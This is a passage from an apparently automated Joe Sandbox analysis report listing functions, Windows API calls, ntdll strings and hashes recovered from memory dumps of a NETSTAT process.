                                                                                                                                                                            • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(OutputEncoding,?,00000050,00000000), ref: 006845D1
                                                                                                                                                                            • _wcsicmp.MSVCRT ref: 006845F2
                                                                                                                                                                            • _wcsicmp.MSVCRT ref: 0068460D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcsicmp$EnvironmentVariable
                                                                                                                                                                            • String ID: Ansi$OutputEncoding$UTF-8$UTF8$Unicode
                                                                                                                                                                            • API String ID: 198002717-1479523454
                                                                                                                                                                            • Opcode ID: 2a39c42926dc38ad0cf8ca1286c000df6a52db20fc3e15a95c1a1bb663587337
                                                                                                                                                                            • Instruction ID: 062635252ef1444355d205ec7a26b2bb18ad6c9a62b7e93b7b8f77b7d4720d84
                                                                                                                                                                            • Opcode Fuzzy Hash: 2a39c42926dc38ad0cf8ca1286c000df6a52db20fc3e15a95c1a1bb663587337
                                                                                                                                                                            • Instruction Fuzzy Hash: E711BF35600307AFDB24AB20DC19BEA77EEDF46324F51065AE041D6180FFB09AC1CB15
                                                                                                                                                                            Function 006835EE Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 169COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetHostNameW.WS2_32(00687CD8,00000104), ref: 0068365F
                                                                                                                                                                            • wcschr.MSVCRT ref: 00683676
                                                                                                                                                                            • GetNameInfoW.WS2_32(?,?,?,00000104,00000000,00000000,?), ref: 006836A2
                                                                                                                                                                            • GetNameInfoW.WS2_32(?,?,?,00000104,00000000,00000000,?), ref: 006836C9
                                                                                                                                                                            • GetNameInfoW.WS2_32(?,?,00000000,00000000,?,000000C8,?), ref: 006836F5
                                                                                                                                                                            • GetNameInfoW.WS2_32(?,?,00000000,00000000,?,000000C8,?), ref: 00683726
                                                                                                                                                                            • wcschr.MSVCRT ref: 00683783
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name$Info$wcschr$Host
                                                                                                                                                                            • String ID: %s:%s$[%s]:%s
                                                                                                                                                                            • API String ID: 3401028553-3707195743
                                                                                                                                                                            • Opcode ID: c702a4e066380ed06404762d85d8cf3eab98e4525383d37f89003832600304e6
                                                                                                                                                                            • Instruction ID: 87fe0cc86619d20170137af691c415afcbcca67dab5fba60a3436081753829ce
                                                                                                                                                                            • Opcode Fuzzy Hash: c702a4e066380ed06404762d85d8cf3eab98e4525383d37f89003832600304e6
                                                                                                                                                                            • Instruction Fuzzy Hash: 2D51C1B1A00229AFDF24AF14CC40AEA777EEF45B01F5042A9F649A7350E7709F85CB55
                                                                                                                                                                            Function 0068289D Relevance: 15.4, APIs: 10, Instructions: 365memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00681C89: GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000028,?,0000274F,?,?,?,?,?,?,0068222F), ref: 00681CA2
                                                                                                                                                                              • Part of subcall function 00681C89: OpenProcessToken.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,?,?,?,?,?,0068222F), ref: 00681CA9
                                                                                                                                                                              • Part of subcall function 00681C89: AdjustTokenPrivileges.API-MS-WIN-SECURITY-BASE-L1-1-0(?,00000000,00000001,00000010,00000000,00000000), ref: 00681CD9
                                                                                                                                                                              • Part of subcall function 00681C89: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00681CE7
                                                                                                                                                                              • Part of subcall function 006848A5: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,00000000,00000000,?,00000000,00000000,?,?,?,006843B7,0000275D,00000000,00000000,?), ref: 006848CA
                                                                                                                                                                            • NsiAllocateAndGetTable.NSI(00000001,00681100,00000002,?,0000003C,00000000,00000000,00000000,00000000,?,00000008,?,00000000,?,00000000,000000FF), ref: 006829C3
                                                                                                                                                                            • NsiAllocateAndGetTable.NSI(00000001,00681100,00000003,?,00000020,00000000,00000000,00000000,00000000,?,00000008,?,00000000), ref: 00682A02
                                                                                                                                                                              • Part of subcall function 006835EE: GetHostNameW.WS2_32(00687CD8,00000104), ref: 0068365F
                                                                                                                                                                              • Part of subcall function 006835EE: wcschr.MSVCRT ref: 00683676
                                                                                                                                                                              • Part of subcall function 006835EE: GetNameInfoW.WS2_32(?,?,00000000,00000000,?,000000C8,?), ref: 006836F5
                                                                                                                                                                              • Part of subcall function 006835EE: GetNameInfoW.WS2_32(?,?,00000000,00000000,?,000000C8,?), ref: 00683726
                                                                                                                                                                              • Part of subcall function 006835EE: GetNameInfoW.WS2_32(?,?,?,00000104,00000000,00000000,?), ref: 006836A2
                                                                                                                                                                              • Part of subcall function 006835EE: GetNameInfoW.WS2_32(?,?,?,00000104,00000000,00000000,?), ref: 006836C9
                                                                                                                                                                              • Part of subcall function 006835EE: wcschr.MSVCRT ref: 00683783
                                                                                                                                                                            • NsiFreeTable.NSI(?,00000000,00000000,?), ref: 00682C07
                                                                                                                                                                            • NsiFreeTable.NSI(?,00000000,00000000,?), ref: 00682C1B
                                                                                                                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00682C2C
                                                                                                                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00682C37
                                                                                                                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00682C48
                                                                                                                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00682C59
                                                                                                                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00682C6A
                                                                                                                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00682C7B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Free$Local$Name$InfoTable$AllocateProcessTokenwcschr$AdjustCloseCurrentFormatHandleHostMessageOpenPrivileges
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3162703053-0
                                                                                                                                                                            • Opcode ID: 6f96b010d20cbb898c9597897e785d85e85a5d27cca653103b7ac9b8f1f26579
                                                                                                                                                                            • Instruction ID: 9d3b66a8f6f8b8e7be01aa7e688d9b5b59a74c2839f11bf8c9b0391a0a0aefa7
                                                                                                                                                                            • Opcode Fuzzy Hash: 6f96b010d20cbb898c9597897e785d85e85a5d27cca653103b7ac9b8f1f26579
                                                                                                                                                                            • Instruction Fuzzy Hash: 81E15171D08319AFEB61AF54CC85BE9B7BAEB04344F044199F50DA6281DBB8AEC4CF51
                                                                                                                                                                            Function 00681D6B Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 196memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • NsiAllocateAndGetTable.NSI(00000001,00681118,00000003,00000017,00000038,00000000,00000000,00000000,00000010,?,00000020,006824B9,00000000,00000000,0000274F,00000000), ref: 00681DB3
                                                                                                                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000008,006824AD,?,?,?,?,?,?,?,?,?,?,?,006824B9,00000000), ref: 00681DDA
                                                                                                                                                                            • NsiFreeTable.NSI(00000017,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,006824B9), ref: 00681DF0
                                                                                                                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000008,006824AD,?,?,?,?,?,?,?,?,?,?,?,006824B9,00000000), ref: 00681E0B
                                                                                                                                                                            • memset.MSVCRT ref: 00681EBB
                                                                                                                                                                            • NsiFreeTable.NSI(00000017,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,006824B9), ref: 00681F71
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Table$AllocFreeHeap$Allocatememset
                                                                                                                                                                            • String ID: 8$p^v
                                                                                                                                                                            • API String ID: 1604459968-753539834
                                                                                                                                                                            • Opcode ID: 328c12449aaaffafbe111976d71d587b685cf133c75941bb20e4f05af5548c99
                                                                                                                                                                            • Instruction ID: 3eca3a473645dc65a4ab61e4cc2d1d6dd3b7628ddac6b052aa3194326b69b0bd
                                                                                                                                                                            • Opcode Fuzzy Hash: 328c12449aaaffafbe111976d71d587b685cf133c75941bb20e4f05af5548c99
                                                                                                                                                                            • Instruction Fuzzy Hash: A281D7B5D00219EFDB14DF98C981AADBBB9FF09314F24819AE905AB341D371AE42DF50
                                                                                                                                                                            Function 03177630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 031B46FC
                                                                                                                                                                            • Execute=1, xrefs: 031B4713
                                                                                                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 031B4787
                                                                                                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 031B4725
                                                                                                                                                                            • ExecuteOptions, xrefs: 031B46A0
                                                                                                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 031B4742
                                                                                                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 031B4655
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                            • API String ID: 0-484625025
                                                                                                                                                                            • Opcode ID: 578fd42226a121e63dd24a5ce152f0d839355ed076f08d1a622f7fec05978362
                                                                                                                                                                            • Instruction ID: 7e1ed0b7e8b0e19d72a4006c68f701402da12e501dbef922b24d8ce45c4e0165
                                                                                                                                                                            • Opcode Fuzzy Hash: 578fd42226a121e63dd24a5ce152f0d839355ed076f08d1a622f7fec05978362
                                                                                                                                                                            • Instruction Fuzzy Hash: C151E735A003197BEB21EBA5DC99BFD77B8AF0C700F0800A9E505AB1C1EB71AA45CF50
                                                                                                                                                                            Function 00684662 Relevance: 13.6, APIs: 9, Instructions: 70COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00684530: _fileno.MSVCRT ref: 0068453B
                                                                                                                                                                              • Part of subcall function 00684530: _get_osfhandle.MSVCRT ref: 00684542
                                                                                                                                                                              • Part of subcall function 006845AB: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(OutputEncoding,?,00000050,00000000), ref: 006845D1
                                                                                                                                                                              • Part of subcall function 006845AB: _wcsicmp.MSVCRT ref: 006845F2
                                                                                                                                                                            • fgetpos.MSVCRT ref: 00684697
                                                                                                                                                                            • _fileno.MSVCRT ref: 006846B1
                                                                                                                                                                            • _setmode.MSVCRT ref: 006846B9
                                                                                                                                                                            • fwprintf.MSVCRT ref: 006846C5
                                                                                                                                                                            • fgetpos.MSVCRT ref: 006846DE
                                                                                                                                                                            • _fileno.MSVCRT ref: 006846F8
                                                                                                                                                                            • _setmode.MSVCRT ref: 00684700
                                                                                                                                                                            • _fileno.MSVCRT ref: 00684710
                                                                                                                                                                            • _write.MSVCRT ref: 00684718
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _fileno$_setmodefgetpos$EnvironmentVariable_get_osfhandle_wcsicmp_writefwprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2328354365-0
                                                                                                                                                                            • Opcode ID: ec48e614614e60b8909a0bf390db4105078d7f013943f0eaa6fcada2de940d97
                                                                                                                                                                            • Instruction ID: c61a67c060e39622a77d32a60f2fe12431a351d2cf0995e7c6f151f5b4592347
                                                                                                                                                                            • Opcode Fuzzy Hash: ec48e614614e60b8909a0bf390db4105078d7f013943f0eaa6fcada2de940d97
                                                                                                                                                                            • Instruction Fuzzy Hash: ED112131900216FFDB14BBE0EC4E9DE77AAFF06362B600655E441E2680EF749A018755
                                                                                                                                                                            Function 006859F3 Relevance: 10.6, APIs: 7, Instructions: 105sleepCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,00686160,0000000C), ref: 00685A30
                                                                                                                                                                            • _amsg_exit.MSVCRT ref: 00685A45
                                                                                                                                                                            • _initterm.MSVCRT ref: 00685A99
                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00685AC5
                                                                                                                                                                            • exit.MSVCRT ref: 00685B0C
                                                                                                                                                                            • _XcptFilter.MSVCRT ref: 00685B1E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 796493780-0
                                                                                                                                                                            • Opcode ID: acf1e74bc60145503d4b2dd364430134065c9d2dbca7f036d386d0b22f6aeb3c
                                                                                                                                                                            • Instruction ID: ab413974d12bace495468bacdb8c8bdc683def90fab002130b42334b6d32928b
                                                                                                                                                                            • Opcode Fuzzy Hash: acf1e74bc60145503d4b2dd364430134065c9d2dbca7f036d386d0b22f6aeb3c
                                                                                                                                                                            • Instruction Fuzzy Hash: A5318E71648A15AFDB29FB64EC89A6977A7E704720F20136DE403973A0DB708C418B54
                                                                                                                                                                            Function 00684530 Relevance: 10.6, APIs: 7, Instructions: 53COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _fileno.MSVCRT ref: 0068453B
                                                                                                                                                                            • _get_osfhandle.MSVCRT ref: 00684542
                                                                                                                                                                            • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000), ref: 00684558
                                                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00684564
                                                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0068456E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$FileType_fileno_get_osfhandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3475475711-0
                                                                                                                                                                            • Opcode ID: 91226a5e166cc5f66a2644f1882d7376851e99832fe57eaa7c306b3eebde5e57
                                                                                                                                                                            • Instruction ID: fe392d2c84373f9fad84d663c83b4d4bab1912720802856d59285adf591c2f8a
                                                                                                                                                                            • Opcode Fuzzy Hash: 91226a5e166cc5f66a2644f1882d7376851e99832fe57eaa7c306b3eebde5e57
                                                                                                                                                                            • Instruction Fuzzy Hash: 5C016273A14212BF9730EBB5AC4C9AF36ABDA857717514725E652D3290EE20CC018773
                                                                                                                                                                            Function 0318B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __aulldvrm
                                                                                                                                                                            • String ID: +$-$0$0
                                                                                                                                                                            • API String ID: 1302938615-699404926
                                                                                                                                                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                            • Instruction ID: 498523e31b439c42a4af9dc524980c1a251bb793d932049338c95eecaaac4323
                                                                                                                                                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                            • Instruction Fuzzy Hash: 03819074E092499BDF28EF68C8517BEBBA5AF4D310F2CC559D861A73D0C73498418F58
                                                                                                                                                                            Function 031F20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                                            • String ID: %%%u$[$]:%u
                                                                                                                                                                            • API String ID: 48624451-2819853543
                                                                                                                                                                            • Opcode ID: 96aefe3a6ef47411f417578e634af182caca25c2d0424a84797a08fc0aa7be7f
                                                                                                                                                                            • Instruction ID: af34c895ee6d73dfb88fea75af4fb40e4550e5fea98b21a462b32efb4aa479cf
                                                                                                                                                                            • Opcode Fuzzy Hash: 96aefe3a6ef47411f417578e634af182caca25c2d0424a84797a08fc0aa7be7f
                                                                                                                                                                            • Instruction Fuzzy Hash: 9921537AA00219AFDB10EF69D840AEEB7E8AF4D640F480516EA15D7200E730D9028BA5
                                                                                                                                                                            Function 00682812 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • memset.MSVCRT ref: 00682835
                                                                                                                                                                            • GetSystemDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000105), ref: 00682853
                                                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0068285D
                                                                                                                                                                            • _wsystem.MSVCRT ref: 00682885
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DirectoryErrorLastSystem_wsystemmemset
                                                                                                                                                                            • String ID: \route.exe" print
                                                                                                                                                                            • API String ID: 786266830-1087285068
                                                                                                                                                                            • Opcode ID: af7b0c14129c9d56bffc97d4cfb5e058982f607ebe6504205a5179db5725295d
                                                                                                                                                                            • Instruction ID: 048eddc36ea7918e9809d0cdfc917bcdfbf0f5b0064ac37dc6a579d2d07580c0
                                                                                                                                                                            • Opcode Fuzzy Hash: af7b0c14129c9d56bffc97d4cfb5e058982f607ebe6504205a5179db5725295d
                                                                                                                                                                            • Instruction Fuzzy Hash: E4018670A40309FBDB10FB64DD5EB9A777A9F08700F5011A9A649E7281EB74AA49CB41
                                                                                                                                                                            Function 0316F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 031B02E7
                                                                                                                                                                            • RTL: Re-Waiting, xrefs: 031B031E
                                                                                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 031B02BD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                            • API String ID: 0-2474120054
                                                                                                                                                                            • Opcode ID: 819b032d1d10738ea1c5ffbfc6bf1bfeae76084cc277fd2aca1e8db04948ad72
                                                                                                                                                                            • Instruction ID: b64c2ec86107e7e6a04ef7b59cd354e6795f9293ba678b9c89d2d00d5f920ca1
                                                                                                                                                                            • Opcode Fuzzy Hash: 819b032d1d10738ea1c5ffbfc6bf1bfeae76084cc277fd2aca1e8db04948ad72
                                                                                                                                                                            • Instruction Fuzzy Hash: 5EE1DD306087419FD724CF68D884B6AB7E4BF8C314F184AADF4A58B2E0D774D896CB42
                                                                                                                                                                            Function 0317BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • RTL: Re-Waiting, xrefs: 031B7BAC
                                                                                                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 031B7B7F
                                                                                                                                                                            • RTL: Resource at %p, xrefs: 031B7B8E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                            • API String ID: 0-871070163
                                                                                                                                                                            • Opcode ID: ae4078a57ea5d10f084ac9e656b65ab14a73971a40a0ba7fc14022da11511c7b
                                                                                                                                                                            • Instruction ID: 8c7cbe48e767157290d263e13919961ba69dc11f00068605750b171a6ca55970
                                                                                                                                                                            • Opcode Fuzzy Hash: ae4078a57ea5d10f084ac9e656b65ab14a73971a40a0ba7fc14022da11511c7b
                                                                                                                                                                            • Instruction Fuzzy Hash: FF41DE353097029FC724DE25C940B6AB7F5EF8DB10F184A2DF85ADB680DB31E9468B91
                                                                                                                                                                            Function 0317B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 031B728C
                                                                                                                                                                            Strings
                                                                                                                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 031B7294
                                                                                                                                                                            • RTL: Re-Waiting, xrefs: 031B72C1
                                                                                                                                                                            • RTL: Resource at %p, xrefs: 031B72A3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                            • API String ID: 885266447-605551621
                                                                                                                                                                            • Opcode ID: 79486665517281a0931cba412df791ba9980db31349301bfe4cfb42cf3b48465
                                                                                                                                                                            • Instruction ID: 096f1afde93064aacdbf719e4608588110bcd15062e8339e0cbb5a96a9b0a198
                                                                                                                                                                            • Opcode Fuzzy Hash: 79486665517281a0931cba412df791ba9980db31349301bfe4cfb42cf3b48465
                                                                                                                                                                            • Instruction Fuzzy Hash: 1341FF35604346AFC720DE25CC41BAAB7B5FF9C710F184A59F996AB280DB31E8528BD0
                                                                                                                                                                            Function 031F2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
